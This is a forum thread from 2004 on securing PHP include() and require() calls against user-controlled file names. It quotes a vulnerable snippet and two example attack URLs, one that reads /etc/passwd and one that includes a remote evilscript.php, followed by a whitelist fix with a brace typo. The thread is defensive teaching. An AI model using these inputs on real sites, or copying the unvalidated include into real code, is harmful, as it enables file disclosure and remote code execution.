 Lock down your PHP |
Welcome Guest ( Log In | Click here to Register a free account now! )
Register a free account to unlock additional features at BleepingComputer.com
Welcome to Bleeping Computer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.| Important Announcement: The winners of the BC Million Post contest have been announced. You can read who the winners are at this post. - BleepingComputer Management |
  |
 Dec 29 2004, 10:14 AM
Post
#1
|
|
 Forum Regular  Group: HJT Team Posts: 312 Joined: 30-June 04 Member No.: 1,120  |
If your page is using Include() and/or Require() functions, make sure you are doing an error check to pull only the files you want. QUOTE(devshed) 1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first. Take the following example: CODE if(isset($page)) { include($page); } Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON): script.php?page=/etc/passwd Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code. On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this: script.php?page=http://mysite.com/evilscript.php He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser. Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed. CODE $pages = array('index.html', 'page2.html', 'page3.html'); if( in_array($page, $pages) ) { include($page); { else { die("Nice Try."); } More good PHP security tips can be found here http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ I have been fixing hacked websites the last couple days because the scripts did not have a good error check. This post has been edited by ColdinCbus: Dec 29 2004, 10:15 AM -------------------- |
 |
 
|
|
Dec 29 2004, 12:31 PM
Post
#2
|
|
 Bleep Bleep! Group: Admin Posts: 29,367 Joined: 24-January 04 From: USA Member No.: 3 |
Very informative post!
-------------------- Lawrence
|
|
|
|
|
Dec 29 2004, 04:42 PM
Post
#3
|
|
|
Member Group: HJT Team Posts: 17 Joined: 11-November 04 Member No.: 4,893 |
Thank you! I'll check out that link.
|
|
|
|
|
Mar 6 2005, 01:36 PM
Post
#4
|
|
|
New Member Group: Members Posts: 3 Joined: 25-October 04 Member No.: 4,035 |
Nice.
I write PHP code, and although yet to encounter problems of this nature, it's worth being aware of it for future consideration. 
|
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
| Lo-Fi Version | Time is now: 22nd November 2008 - 05:08 AM |
© 2003-2008 All Rights Reserved Bleeping Computer LLC.